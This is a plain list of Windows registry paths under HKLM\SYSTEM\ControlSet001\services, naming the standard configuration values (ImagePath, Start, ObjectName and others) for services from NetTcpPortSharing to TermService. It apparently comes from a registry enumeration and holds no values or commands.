HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Tag
